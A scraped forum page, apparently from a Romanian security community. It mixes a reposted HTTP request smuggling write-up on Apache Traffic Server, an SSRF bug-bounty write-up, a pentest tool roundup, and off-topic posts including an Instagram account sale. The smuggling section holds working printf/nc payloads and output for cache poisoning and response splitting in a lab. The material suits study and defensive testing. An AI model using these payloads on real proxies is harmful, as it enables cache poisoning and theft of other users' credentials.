|--A(1A+1/2B)-->| | * Issue 1 & 2 * | | |--A(1A+1/2B)-->| * Issue 3 * | | |<-A(404)-------| | | | [1/2B] | |<-A(404)-------| [1/2B] | |--C----------->| [1/2B] | | |--C----------->| * ending B * | | [*CP*]<--B(200)----| | |<--B(200)------| | |--C--------------------------->| | |<--B(200)--------------------[HIT] | 1A + 1/2B means request A + an incomplete query B A(X) : means X query is hidden in body of query A CP : Cache poisoning Issue 1 : ATS transmit 'header[SPACE]: Value', a bad HTTP header. Issue 2 : ATS interpret this bad header as valid (so 1/2B still hidden in body) Issue 3 : Nginx encounter the bad header but ignore the header instead of sending an error 400. So 1/2B is discovered as a new query (no Content-length) request B contains an incomplete header (no crlf) ending B: the 1st line of query C ends the incomplete header of query B. all others headers are added to the query. C disappears and mix C HTTP credentials with all previous B headers (cookie/bearer token/Host, etc.) Instead of cache poisoning you could also play with the incomplete 1/B query and wait for the Innocent query to finish this request with HTTP credentials of this user (cookies, HTTP Auth, JWT tokens, etc.). That would be another attack vector. Here we will simply demonstrate cache poisoning. Run this attack: for i in {1..9} ;do printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ 'X-info: evil 1.5 query, bad CL header\r\n'\ 'Content-Length :117\r\n'\ '\r\n'\ 'GET /index.html?INJECTED='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'X-info: evil poisoning query\r\n'\ 'Dummy-unterminated:'\ |nc -q 1 8007 done It should work, Nginx adds an X-Location-echo header in this lab configuration, where we have the first line of the query added on the response headers. This way we can observe that the second response is removing the real second query first line and replacing it with the hidden first line. On my case the last query response contained: X-Location-echo: /index.html?INJECTED=3 But this last query was GET /index.html?INJECTED=9. You can check the cache content with: for i in {1..9} ;do printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ '\r\n'\ |nc -q 1 8007 done In my case I found 6 404 (regular) and 3 200 responses (ouch), the cache is poisoned. If you want to go deeper in Smuggling understanding you should try to play with wireshark on this example. Do not forget to restart the cluster to empty the cache. Here we did not played with a C query yet, the cache poisoning occurs on our A query. Unless you consider the /does-not-exists.html?cache='$i' as C queries. But you can easily try to inject a C query on this cluster, where Nginx as some waiting requests, try to get it poisoned with /index.html?INJECTED=3 responses: for i in {1..9} ;do printf 'GET /innocent-C-query.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ '\r\n'\ |nc -q 1 8007 done This may give you a touch on real world exploitations, you have to repeat the attack to obtain something. Vary the number of servers on the cluster, the pools settings on the various layers of reverse proxies, etc. Things get complex. The easiest attack is to be a chaos generator (defacement like or DOS), fine cache replacement of a target on the other hand requires fine study and a bit of luck. Does this work on port 8001 with HaProxy? well, no, of course. Our header syntax is invalid. You would need to hide the bad query syntax from HaProxy, maybe using another smuggling issue, to hide this bad request in a body. Or you would need a load balancer which does not detect this invalid syntax. Note that in this example the nginx behavior on invalid header syntax (ignore it) is also not standard (and wont be fixed, AFAIK). This invalid space prefix problem is the same issue as Apache httpd in CVE-2016-8743. HTTP Response Splitting: Content-Length Ignored on Cache Hit Still there? Great! Because now is the nicest issue. At least for me it was the nicest issue. Mainly because I've spend a lot of time around it without understanding it. I was fuzzing ATS, and my fuzzer detected issues. Trying to reproduce I had failures, and success on previoulsy undetected issues, and back to step1. Issues you cannot reproduce, you start doubting that you saw it before. Suddenly you find it back, but then no, etc. And of course I was not searching the root cause on the right examples. I was for example triggering tests on bad chunked transmissions, or delayed chunks. It was very a long (too long) time before I detected that all this was linked to the cache hit/cache miss status of my requests. On cache Hit Content-Length header on a GET query is not read. That's so easy when you know it... And exploitation is also quite easy. We can hide a second query in the first query body, and on cache Hit this body becomes a new query. This sort of query will get one response first (and, yes, that's only one query), on a second launch it will render two responses (so an HTTP request Splitting by definition): 01 GET /index.html?cache=zorg42 HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 Cache-control: max-age=300\r\n 04 Content-Length: 71\r\n 05 \r\n 06 GET /index.html?cache=zorg43 HTTP/1.1\r\n 07 Host: dummy-host7.example.com\r\n 08 \r\n Line 04 is ignored on cache hit (only after the first run, then), after that line 06 is now a new query and not just the 1st query body. This HTTP query is valid, THERE IS NO invalid HTTP syntax present. So it's quite easy to perform a successful complete Smuggling attack from this issue, even using HaProxy in front of ATS. If HaProxy is configured to use a keep-alive connection to ATS we can fool the HTTP stream of HaProxy by sending a pipeline of two queries where ATS sees 3 queries: Attack schema [ATS HTTP-Splitting issue on Cache hit + GET + Content-Length] Something HaProxy ATS Nginx |--A----------->| | | | |--A----------->| | | | |--A----------->| | | [cache]<--A--------| | | (etc.) <------| | warmup --------------------------------------------------------- | | | | attack |--A(+B)+C----->| | | | |--A(+B)+C----->| | | | [HIT] | * Bug * | |<--A-----------| | * B 'discovered' * |<--A-----------| |--B----------->| | | |<-B------------| | |<-B------------| | [ouch]<-B----------| | | * wrong resp. * | | |--C----------->| | | |<--C-----------| | [R]<--C----------| | rejected First, we need to init cache, we use port 8001 to get a stream HaProxy->ATS->Nginx. printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-control: max-age=300\r\n'\ 'Content-Length: 0\r\n'\ '\r\n'\ |nc -q 1 8001 You can run it two times and see that on a second time it does not reach the nginx access.log. Then we attack HaProxy, or any other cache set in front of this HaProxy. We use a pipeline of 2 queries, ATS will send back 3 responses. If a keep-alive mode is present in front of ATS there is a security problem. Here it's the case because we do not use option: http-close on HaProxy (which would prevent usage of pipelines). printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-control: max-age=300\r\n'\ 'Content-Length: 74\r\n'\ '\r\n'\ 'GET /index.html?evil=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /victim.html?cache=zorglub HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 8001 Query for /victim.html (should be a 404 in our example) gets response for /index.html (X-Location-echo: /index.html?evil=cogip2000). HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 16:05:41 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?cache=cogip2000 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 12 $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 16:05:53 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?evil=cogip2000 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Here the issue is critical, especially because there is not invalid syntax in the attacking query. We have an HTTP response splitting, this means two main impacts: ATS may be used to poison or hurt an actor used in front of it the second query is hidden (that's a body, binary garbage for an http actor), so any security filter set in front of ATS cannot block the 2nd query. We could use that to hide a second layer of attack like an ATS cache poisoning as described in the other attacks. Now that you have a working lab you can try embedding several layers of attacks... That's what the Drain the request body if there is a cache hit fix is about. Just to better understand real world impacts, here the only one receiving response B instead of C is the attacker. HaProxy is not a cache, so the mix C-request/B-response on HaProxy is not a real direct threat. But if there is a cache in front of HaProxy, or if we use several chained ATS proxies... Timeline 2017-12-26: Reports to project maintainers 2018-01-08: Acknowledgment by project maintainers 2018-04-16: Version 7.1.3 with most of the fix 2018-08-04: Versions 7.1.4 and 6.2.2 (officially containing all fixs, and some other CVE fixs) 2018-08-28: CVE announce 2019-09-17: This article (yes, url date is wrong, real date is september) See also Video Defcon 24: HTTP Smuggling Defcon support Video Defcon demos Sursa: https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
  21. 1 point
    SSRF | Reading Local Files from DownNotifier server Posted on September 18, 2019 by Leon Hello guys, this is my first write-up and I would like to share it with the bug bounty community, it’s a SSRF I found some months ago. DownNotifier is an online tool to monitor a website downtime. This tool sends an alert to registered email and sms when the website is down. DownNotifier has a BBP on Openbugbounty, so I decided to take a look on https://www.downnotifier.com. When I browsed to the website, I noticed a text field for URL and SSRF vulnerability quickly came to mind. Getting XSPA The first thing to do is add http: on “Website URL” field. Select “When the site does not contain a specific text” and write any random text. I sent that request and two emails arrived in my mailbox a few minutes later. The first to alert that a website is being monitored and the second to alert that the website is down but with the response inside an html file. And what is the response…? Getting Local File Read I was excited but that’s not enough to fetch very sensitive data, so I tried the same process but with some uri schemes as file, ldap, gopher, ftp, ssh, but it didn’t work. I was thinking how to bypass that filter and remembered a write-up mentioning a bypass using a redirect with Location header in a PHP file hosted on your own domain. I hosted a php file with the above code and the same process registering a website to monitor. A few minutes later an email arrived at the mailbox with an html file. And the response was… I reported the SSRF to DownNotifier support and they fixed the bug very fast. I want to thank the DownNotifier support because they were very kind in our communication and allowed me to publish this write-up. I also want to thank the bug bounty hunter who wrote the write-up where he used the redirect technique with the Location header. Write-up: https://medium.com/@elberandre/1-000-ssrf-in-slack-7737935d3884 Sursa: https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
  22. 1 point
    Stuff Youtube Link : https://www.youtube.com/channel/UC3VydBGBl132baPCLeDspMQ
  23. 1 point
    In lipsa unui avertizor acum in anul 2019 as vrea sa va prezint cateva linkuri legate de subiectul cutremurelor . Sper ca nu ma abat prea tare de la subiect dar poate are legatura cumva . Link-uri utile - web - alerte seism : 1- https://web.telegram.org/#/im?p=@alertaCutremur 2- http://alerta.infp.ro/ 3- https://twitter.com/earthbotro 4- https://twitter.com/incdfp 5- https://twitter.com/cutremurinfo 6- https://www.facebook.com/earthbotro 7- https://www.messenger.com/t/earthbotro Recomand si instalarea in browser , a extensiilor de genul , tab auto refresh . Link Institutul Național de Cercetare-Dezvoltare pentru Fizica Pământului : http://www.infp.ro/ sau www.infp.ro/data/cam-image-320.jpg ( necesita refresh F5 ) Link Alerta Seism : http://alerta.infp.ro/ sau http://resyr.infp.ro/results.php Link seismograf Romania : Link inregistrare live a seismografului MLR : http://www.mobotix.ro/camere_supraveghere_live_ro_928.html Link Mobotix Live Streaming : http://streaming.mobotixtools.com/live/5271f19a1048b Deoarece acum in anul 2019 a evoluat invers situatia si cele doua adrese de mai sus nu mai functioneaza conteaza doar camera ca este d'aia buna de calitate si de 2000 de dolari ( M12D-Sec-DNight ) ... probabil nu trebuie sa o vada toata populimea ce inregistreaza camera de calitate nici nu mai vorbim ... off off off ... Alte link-uri / surse pentru vizionarea seismografului romanesc : https://ecrantv.ro/3852/webcam-observatorul-seismic-muntele-rosu/ sau www.infp.ro/data/cam-image-320.jpg sau 92 87 22 214 ( ''cine stie cunoaste'' ) .
  24. 1 point
  25. 1 point
  26. 1 point
    Python e interpretat, deci poti arunca un ochi peste cum e facut JS. In JavaScript: The Good Parts cred ca am vazut un exemplu de state machine.
  27. 1 point
    A powerful small guide to deal with Cross-Site Scripting in web applications bug hunting and security assessments Download Link : https://www.pdfdrive.com/xss-cheat-sheet-d158319463.html
  28. 1 point
    Ti se potriveste avatarul >un fel de antivirus si iti rooteaza si telefonul Pai daca ai avut numai mediatek-uri logic ca ti-a mers cu supersu/kingroot Da-i cu xda cum a zis si prajitu' de OKQL
  29. 1 point
  30. 1 point
  31. 1 point
  32. 1 point
    Ba, urmaresc forumu asta din umbra de ceva timp, nu am mai postat. Dar cat puteti ba sa fiti de terminati? Oare prostia asta a voastra nu are limite? Ce baza de date ba, ca aia era cu persoane de prin anii 90'. 80% din cei care sunt in baza aia de date au murit. Numa invitatii filelist, coduri, dork-uri si baze de date visati. Sa faceti ceva pentru viitoru vostru n-ati face. Ai aici oameni care sunt guru in Linux, care stiu Python si alte lucruri utile si voi cereti baze de date.
  33. 1 point
    Am adaugat suport pentru Windows x64, Linux x86 si Linux x64. https://www.defcon.org/html/defcon-27/dc-27-demolabs.html#Shellcode Compiler
  34. 1 point
    32/64 bits version Sharing is caring Download link : https://mega.nz/?fbclid=IwAR3DhN9QsjIrDsdGHq-HQPjh15ghzefhx28wUUBZ0UGdeTyfhmutezFclSQ#F!8xh1EIyI!5cZd5_e-LI4Akw7YVYoBNA
  35. 1 point
    Cam liniste pe aici
  36. 1 point
    Salutare. Am doua conturi deinstagram de vanzare ! 1.Cont instagram cu peste 4300 followers. -Toti adaugati manual. -100% romani. -primeste in jur de 400-1500 likeuri pe post. -Nisa este comedie. -Il puteti transforma in contul vostru personal. -Pret: 40 euro. Nu negociez,acesta este pretul pe piata + am muncit o luna la el...si lucrul cel mai important sunt adaugati manual 2.Cont cu peste 2500 followers. -Adaugati manual -50%romani - 50 straini. -Strange pe post in jur de 300 likeuri. -Nisa fan Inna. Pret:15 euro. Daca le cumparati pe amandoua,le las la 50 euro. Link in pm
  37. 1 point
    Sursa: https://m.habr.com/ru/company/dsec/blog/452836/ Digital Security Company Blog Information Security Network technologies forkyforky may 28 Web tools, or where to start pentester? We continue to talk about useful tools for pentester. In the new article we will look at tools for analyzing the security of web applications. Our colleague BeLove already did a similarselection about seven years ago. It is interesting to see which tools have retained and strengthened their positions, and which have faded into the background and are now rarely used. Note that the Burp Suite also applies here, but there will be a separate publication about it and its useful plugins. Content: Amass Altdns aquatone MassDNS nsec3map Acunetix Dirsearch wfuzz ffuf gobuster Arjun LinkFinder Jsparser sqlmap NoSQLMap oxml_xxe tplmap CeWL Weakpass AEM_hacker Joomscan WPScan Amass Amass is a Go tool for searching and iterating DNS subdomains and mapping an external network. Amass is an OWASP project created to show how organizations on the Internet look to an outsider. Amass gets the names of subdomains in various ways, the tool uses both recursive enumeration of subdomains and search in open sources. To find connected network segments and autonomous system numbers, Amass uses the IP addresses obtained during operation. All found information is used to build a network map. Pros: Information collection techniques include: * DNS - enumeration of subdomains in a dictionary, bruteforce subdomains, “smart” enumeration using mutations based on the found subdomains, reverse DNS requests and search for DNS servers on which it is possible to request a zone transfer request ( AXFR); * Search for open sources - Ask, Baidu, Bing, CommonCrawl, DNSDB, DNSDumpster, DNSTable, Dogpile, Exalead, FindSubdomains, Google, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ThreatCrowd, VirusTotal, Yahoo; * Search TLS certificate databases - Censys, CertDB, CertSpotter, Crtsh, Entrust; * Using the API of search engines - BinaryEdge, BufferOver, CIRCL, HackerTarget, PassiveTotal, Robtex, SecurityTrails, Shodan, Twitter, Umbrella, URLScan; * Search the web archives of the Internet: ArchiveIt, ArchiveToday, Arquivo, LoCArchive, OpenUKArchive, UKGovArchive, Wayback; Integration with Maltego; Provides the most complete coverage for the task of finding DNS subdomains. Minuses: Be careful with amass.netdomains — he will try to access each IP address in the identified infrastructure and obtain domain names from reverse DNS queries and TLS certificates. This is a "loud" technique, it can reveal your intelligence actions in the organization under study. High memory consumption can consume up to 2 GB of RAM in different settings, which will not allow running this tool in the cloud on a cheap VDS. Altdns Altdns is a Python tool for compiling dictionaries for brute force DNS subdomains. Allows you to generate many options for subdomains using mutations and permutations. To do this, use words that are often found in subdomains (for example: test, dev, staging), all mutations and permutations are applied to already known subdomains, which can be submitted to the input of Altdns. The output is a list of variations of subdomains that may exist, and this list can later be used for DNS brute force. Pros: Works well with large data sets. aquatone aquatone - was previously better known as another tool for finding subdomains, but the author himself abandoned this in favor of the aforementioned Amass. Now aquatone is rewritten to Go and more geared for pre-exploration of websites. To do this, aquatone passes through the specified domains and searches for websites on different ports, after which it collects all the information about the site and makes a screenshot. Convenient for quick preliminary exploration of websites, after which you can select priority targets for attacks. Pros: At the output, it creates a group of files and folders that are conveniently used for further work with other tools: * HTML report with collected screenshots and response headers grouped by similarity; * File with all the URLs on which the websites were found; * File with statistics and data page; * Folder with files containing the response headers from the found targets; * Folder with files containing the response body from the found targets; * Screenshots of found websites; Supports work with XML reports from Nmap and Masscan; Uses headless chrome / chromium for screenshots rendering. Minuses: It may attract the attention of intrusion detection systems, and therefore requires adjustment. The screenshot was made for one of the old versions of aquatone (v0.5.0), in which the search for DNS subdomains was implemented.Older versions can be found on the release page. Screenshot aquatone v0.5.0 MassDNS MassDNS is another tool for finding DNS subdomains. Its main difference is that it makes DNS queries directly to many different DNS resolvers and does so with considerable speed. Pros: Fast - able to resolve more than 350 thousand names per second. Minuses: MassDNS can cause a significant load on the DNS resolvers used, which can lead to a ban on these servers or complaints to your provider. In addition, it will cause a large load on the company's DNS servers, if they have them and if they are responsible for the domains you are trying to resolve. The list of resolvers is currently outdated, but if you select broken DNS resolvers and add new known ones, everything will be fine. nsec3map nsec3map is a Python tool to get a complete list of DNSSEC protected domains. Pros: Quickly detects hosts in DNS zones with a minimal number of queries if DNSSEC support is enabled in the zone; As part of the plugin for John the Ripper, which can be used to crack the resulting NSEC3 hashes. Minuses: Many DNS errors are handled incorrectly; There is no automatic parallelization of processing NSEC records - you have to split the namespace manually; High memory consumption. Acunetix Acunetix is a web vulnerability scanner that automates the process of checking web application security. Tests the application for SQL injection, XSS, XXE, SSRF, and many other web vulnerabilities. However, just like any other scanner of multiple web vulnerabilities does not replace the pentester, since complex chains of vulnerabilities or vulnerabilities in logic cannot be found. But it covers a lot of different vulnerabilities, including different CVEs, which the pentester could have forgotten, therefore, it is very convenient to get rid of routine checks. Pros: Low level of false positives; Results can be exported as reports; Performs a large number of checks for different vulnerabilities; Parallel scanning of multiple hosts. Minuses: There is no de-duplication algorithm (Acunetix pages that are of the same functionality will be considered different, because different URLs lead to them), but the developers are working on it; Requires installation on a separate web server, which makes it difficult to test client systems with a VPN connection and use the scanner in an isolated segment of the local client network; It can “rustle” the service under study, for example, send too many attacking vectors to the communication form on the site, thereby greatly complicating business processes; It is a proprietary and, accordingly, non-free solution. Dirsearch Dirsearch is a Python tool for brute force directories and files on websites. Pros: It can distinguish real “200 OK” pages from “200 OK” pages, but with the text “page not found”; Comes with a handy dictionary that has a good balance between size and search efficiency. Contains standard paths typical of many CMS and technology stacks; Its dictionary format, which allows to achieve good efficiency and flexibility of searching files and directories; Convenient output - plain text, JSON; Able to do throttling - a pause between requests, which is vital for any weak service. Minuses: Extensions must be passed as a string, which is inconvenient if you need to transfer many extensions at once; In order to use your dictionary, it will need to be slightly modified to the format of the Dirsearch dictionaries for maximum efficiency. wfuzz wfuzz - Python-fazzer web applications.Probably one of the most famous web phasers.The principle is simple: wfuzz allows phasing any place in an HTTP request, which allows phasing of GET / POST parameters, HTTP headers, including Cookies and other authentication headers. At the same time, it is convenient for simple brute force directories and files, for which you need a good dictionary. It also has a flexible filter system, with which you can filter the responses from the website by different parameters, which allows you to achieve effective results. Pros: Multifunctional - modular structure, assembly takes several minutes; Convenient filtering and fuzzing mechanism; You can phase out any HTTP method, as well as any place in the HTTP request. Minuses: In the state of development. ffuf ffuf - a web-fazer on Go, created in a similar fashion to wfuzz, allows files, directories, URL paths, names and values of GET / POST parameters, HTTP headers, including the Host header for virtual hosts brute-force. Wfuzz differs from its colleague by higher speed and some new features, for example, Dirsearch format dictionaries are supported. Pros: Filters are similar to wfuzz filters, allow flexible configuration of brute force; Allows fuzzing HTTP header values, data from POST requests and various parts of the URL, including the names and values of GET parameters; You can specify any HTTP method. Minuses: In the state of development. gobuster gobuster - a tool for Go for intelligence, has two modes of operation. The first one is used for brute-force files and directories on the website, the second one is used to iterate over the DNS subdomains. The tool initially does not support recursive enumeration of files and directories, which, of course, saves time, but on the other hand, the brute force of each new endpoint on the website needs to be launched separately. Pros: High speed for both brute force DNS subdomains, and for brute force files and directories. Minuses: The current version does not support the installation of HTTP headers; By default, only some of the HTTP status codes (200,204,301,302,307) are considered valid. Arjun Arjun is a tool for brute-force hidden HTTP parameters in GET / POST parameters, as well as in JSON. The built-in dictionary has 25,980 words that Ajrun checks in almost 30 seconds.The trick is that Ajrun does not check each parameter separately, but checks immediately ~ 1000 parameters at a time and looks to see if the answer has changed. If the answer has changed, then divides this 1000 parameters into two parts and checks which of these parts affects the answer. Thus, using a simple binary search, a parameter or several hidden parameters are found that influenced the answer and, therefore, can exist. Pros: High speed due to binary search; Support for GET / POST parameters, as well as parameters in the form of JSON; By the same principle, the Burp Suite plugin also works - param-miner , which is also very good at finding hidden HTTP parameters. We will tell you more about it in the upcoming article about Burp and its plugins. LinkFinder LinkFinder is a Python script for searching links in JavaScript files. Useful for finding hidden or forgotten endpoints / URLs in a web application. Pros: Fast; There is a special plugin for Chrome based on LinkFinder. . Minuses: Inconvenient final conclusion; Does not analyze JavaScript in dynamics; Quite simple link search logic - if JavaScript is obfuscated in some way, or the links are initially missing and dynamically generated, you will not be able to find anything. Jsparser JSParser is a Python script that uses Tornadoand JSBeautifier to analyze relative URLs from JavaScript files. Very useful for detecting AJAX requests and compiling a list of API methods with which the application interacts. Effectively paired with LinkFinder. Pros: Quick parsing javascript files. sqlmap sqlmap is probably one of the most well-known tools for analyzing web applications. Sqlmap automates the search and operation of SQL injections, works with several SQL dialects, has in its arsenal a huge number of different techniques, ranging from quotes head-on and ending with complex vectors for time-based SQL injections. In addition, it has many techniques for further exploitation for various DBMS, therefore, it is useful not only as a scanner for SQL injections, but also as a powerful tool for exploiting already found SQL injections. Pros: A large number of different techniques and vectors; Low number of false positives; Many possibilities for fine tuning, various techniques, target database, tamper scripts for bypassing WAF; Ability to create dump output data; Many different operating possibilities, for example, for some databases - automatic file upload / download, command execution ability (RCE) and others; Support for direct connection to the database using the data obtained during the attack; At the entrance, you can submit a text file with the results of the work Burp - no need to manually compile all the attributes of the command line. Minuses: It is difficult to customize, for example, to write some of your checks due to poor documentation for this; Without the appropriate settings conducts an incomplete set of checks, which can be misleading. NoSQLMap NoSQLMap is a Python tool for automating the search and operation of NoSQL injection. It is convenient to use not only in NoSQL databases, but also directly when auditing web applications using NoSQL. Pros: As well as sqlmap, it allows not only to find a potential vulnerability, but also checks the possibility of its exploitation for MongoDB and CouchDB. Minuses: Does not support NoSQL for Redis, Cassandra, is being developed in this direction. oxml_xxe oxml_xxe is a tool for embedding XXE XML exploits into various file types that use an XML format in some form. Pros: It supports many common formats, such as DOCX, ODT, SVG, XML. Minuses: Not fully supported PDF, JPEG, GIF; Creates only one file. To solve this problem, you can use the docem tool , which can create a large number of files with paylodes in different places. The aforementioned utilities do an excellent job with XXE testing when loading documents containing XML. But also do not forget that XML format handlers can occur in many other cases, for example, XML can be used as a data format instead of JSON. Therefore, we recommend to pay attention to the following repository containing a large variety of payloads: PayloadsAllTheThings . tplmap tplmap is a Python tool to automatically detect and exploit Server-Side Template Injection vulnerabilities. It has settings similar to sqlmap and flags. It uses several different techniques and vectors, including blind-injections, and also has techniques for executing code and loading / unloading arbitrary files. In addition, it has in its arsenal techniques for a dozen different engines for templates and some techniques for searching eval () - like code injections in Python, Ruby, PHP, JavaScript. In case of successful operation, opens an interactive console. Pros: A large number of different techniques and vectors; Supports many engines for rendering templates; A lot of maintenance techniques. CeWL CeWL is a Ruby dictionary generator, created to extract unique words from a specified website, following links on a website to a specified depth.Compiled dictionary of unique words can be used later for brute-force passwords on services or brute-force files and directories on the same web site, or to attack hashes obtained using hashcat or John the Ripper. Useful in compiling a “target” list of potential passwords. Pros: Easy to use. Minuses: You need to be careful with the depth of search, so as not to capture an extra domain. Weakpass Weakpass is a service containing many dictionaries with unique passwords. It is extremely useful for various tasks related to password cracking, ranging from simple online brute-force accounts to target services, ending off-line brute-force hashes obtained usinghashcat or John The Ripper . There are about 8 billion passwords in length from 4 to 25 characters. Pros: Contains both specific dictionaries and dictionaries with the most common passwords - you can choose a specific dictionary for your own needs; Dictionaries are updated and updated with new passwords; Dictionaries are sorted by efficiency. You can choose the option for quick online brute, as well as for a detailed selection of passwords from the extensive dictionary with the latest leaks; There is a calculator showing the time for password brutus on your hardware. In a separate group, we would like to bring the tools for CMS checks: WPScan, JoomScan and AEM hacker. AEM_hacker AEM hacker is a tool for detecting vulnerabilities in Adobe Experience Manager (AEM) applications. Pros: Can detect AEM-applications from the list of URLs submitted to the entrance; It contains scripts for obtaining RCE by loading a JSP shell or using SSRF. Joomscan JoomScan is a Perl tool to automate the detection of vulnerabilities when deploying a Joomla CMS. Pros: Able to find configuration flaws and problems with admin settings; Lists Joomla versions and related vulnerabilities, similar for individual components; Contains more than 1000 exploits for Joomla components; The output of final reports in text and HTML-formats. WPScan WPScan - a tool for scanning sites on WordPress, has in its arsenal vulnerabilities for the WordPress engine itself, as well as for some plugins. Pros: Able to list not only unsafe WordPress plugins and themes, but also to get a list of users and TimThumb files; Can conduct brute force attacks on WordPress sites. Minuses: Without the appropriate settings conducts an incomplete set of checks, which can be misleading. In general, different people prefer different tools for work: they are all good in their own way, and what one person liked, may not suit another. If you think that we have undeservedly bypassed some good utility, write about it in the comments! +43 3748 +43 11.3k374 20 Karma 56,8 Rating @forkyforky User 6 subscribers Share publication Comments 8 Открой дропшиппингмагазинДропшиппинг сотрудничество. Открывай свой магазин с популярными товарами у нас!Дропшиппинг сотрудничество. Открывай свой магазин с популярными товарами у нас!azimut-shop17.tkПерейтиЯндекс.Директ RELATED PUBLICATIONS December 30, 2015 Security of web resources of banks of Russia August 24, 2015 SCADA and mobile phones: safety assessment of applications that turn a smartphone into a plant control panel September 24, 2013 Information security in Australia, and why pentest there is no longer a cake POPULAR PER DAY yesterday at 10:10 Akihabara: Otaku nesting site yesterday at 01:22 PHP Digest number 157 (May 20 - June 3, 2019) yesterday at 14:22 GandCrab authors stop working: they claim they stole enough 2 June About the engineering approach I put in a word yesterday at 14:24 How we made a safe deal for freelance: give a choice, cut features, compare commissions Language settings Full version 2006-2019 © « TM »
  38. 1 point
    Zi bossul meu unde vrei sa termini mankatias pulicica ta ca iti fac ce diploma vrea sufletelul tau.
  39. 1 point
    In ultimele 2 saptamani am facut putin research in zona quantum computing si singura aplicatie la care m-am putut gandi avand in vedere statutul experimental al tehnologiei a fost un RNG. Proiectul este la nivel de hobby, scopul nu a fost sa treaca testele statistice NIST, ci doar "for fun" https://github.com/cionutmihai/tigon Aveti acolo si jurnalul in format PDF, are 57 pag, contine repo-uri, link-uri cu resurse si bibliografia completa (70 titluri). Evident ca nu poti sa reinventezi informatica la tine in sufragerie (cu 200 EUR, cateva carti si niste cursuri pe Youtube sau Coursera) deci subliniez din nou ca e la nivel de amator. In plus, mare parte din librariile disponibile fie sunt in alpha, fie sunt abandonate sau sunt axate strict pe mediul academic si simulari. Take care
  40. 1 point
    Poti gasi aici.La fiecare refresh, iti da alt hec.
  41. 1 point
    contactme bro im have good software and use is free!!
  42. 1 point
    Ok, cam rar vad lumea pe aici sa accepte critica si sa o vada ca pe ceva constructiv, deci bravo, inceput bun. Nu am vrut sa imi pierd vremea initial dar acum poate ca se va prinde ceva. Sfaturi (de luat cu putina sare, nu sunt expert in domeniu dar trecut prin anumite procese similare): 1. Scoate hyperlink-ul la site-ul tau din acest thread, nu te pune intr-o lumina pozitiva. Cineva care vrea sa vada cu cine are de a face inainte sa dea un ban si te cauta pe Google, va vedea ca tu esti in situatia celor pe care vrei sa-i ajuti dar tu nu esti in stare sa te ajuti pe tine insuti. Blind leading the blind if you catch my drift. Adica sa zicem ca tu esti o firma mica si vrei sa iti "maximizezi veniturile prin soluții tehnice" dupa cum spui mai sus, incluzand "marketing online" si "plan de dezvoltare" dupa cum spui pe site, tu tocmai de astea duci lipsa in momentul actual si te gandeai sa spamezi lumea in lipsa de alte idei. Daca o alta firma mica te plateste sa ii promovezi ce faci? Te apuci si spamezi pe altii pentru ei? Anyway, lasand la o parte ironia situatiei in care esti, sa revin la ceva cat de cat mai constructiv: 2. Trebuie sa scoti in evidenta din primele secunde cand cineva intra in contact cu tine/site-ul tau (nu se poate vorbi momentan de "brand") si anume cu ce esti diferit (in sens bun) fata de restul 'nspe mii de pulifrici/e care se dau experti, de ce se merita in primul rand sa petreaca timp sa te asculte (time is money) si apoi de ce sa iti dea bani. Cu alte cuvinte care este USP-ul tau? (Unique Selling Point). Apoi clientul sa inteleaga rapid cum poti folosi acel USP sa ii ajuti pe ei. Site-ul e foarte generic si "rece", nu reiese exact si concret ce oferi si cum si cum ii ajuti specific pe potentialii clienti. 3. Cunoaste-ti competitia, fa-ti temele de casa. Uita-te sa vezi cu cine ai rivaliza pe nisa ta. Uita-te sa vezi ce fac ei bine (dpdv al site-ului si cum se promoveaza) si incearca sa adaptezi (nu copiezi) la contextul tau. Uita-te sa vezi ce le lipseste (considera-te ca ai fi un potential client) si ce nu iti place, ce te-ar convinge sa le devii client, etc. si actioneaza ca atare in afacerea ta. Fa si un mic test cu prietenii, neamurile, familia, etc. si intreaba-i sa se considere mici antreprenori, etc. da-le un context al clientului tau ideal si apoi sa iti dea o privire onesta daca ar apela la serviciile tale ori la altii, ce i-ar convinge sa vina la tine, etc. 4. Cunoaste-ti mediul de operare si anume Romania - cultura in care operezi si anume in astfel de circumstante se merge inca foarte mult pe recomandari, din vorba buna a primilor clienti. In alte tari lumea se uita pe site-uri de rating-uri sau cum era pe vremuri yelp/yellow pages, etc. La inceput e nevoie sa iti creezi o baza puternica de sustinere si financiara dar si din punct de vedere al testimonialului. Pe langa relatia care trebuie sa o dezvolti, pe site trebuie sa explici concrect din acest punct de vedere ce ai facut tu sa inteleaga si ultimul bou. Ca ai pus niste "David, Constanța", "Mariana, Pitesti", "Carmen, Ilfov" e fix pielea pulii, 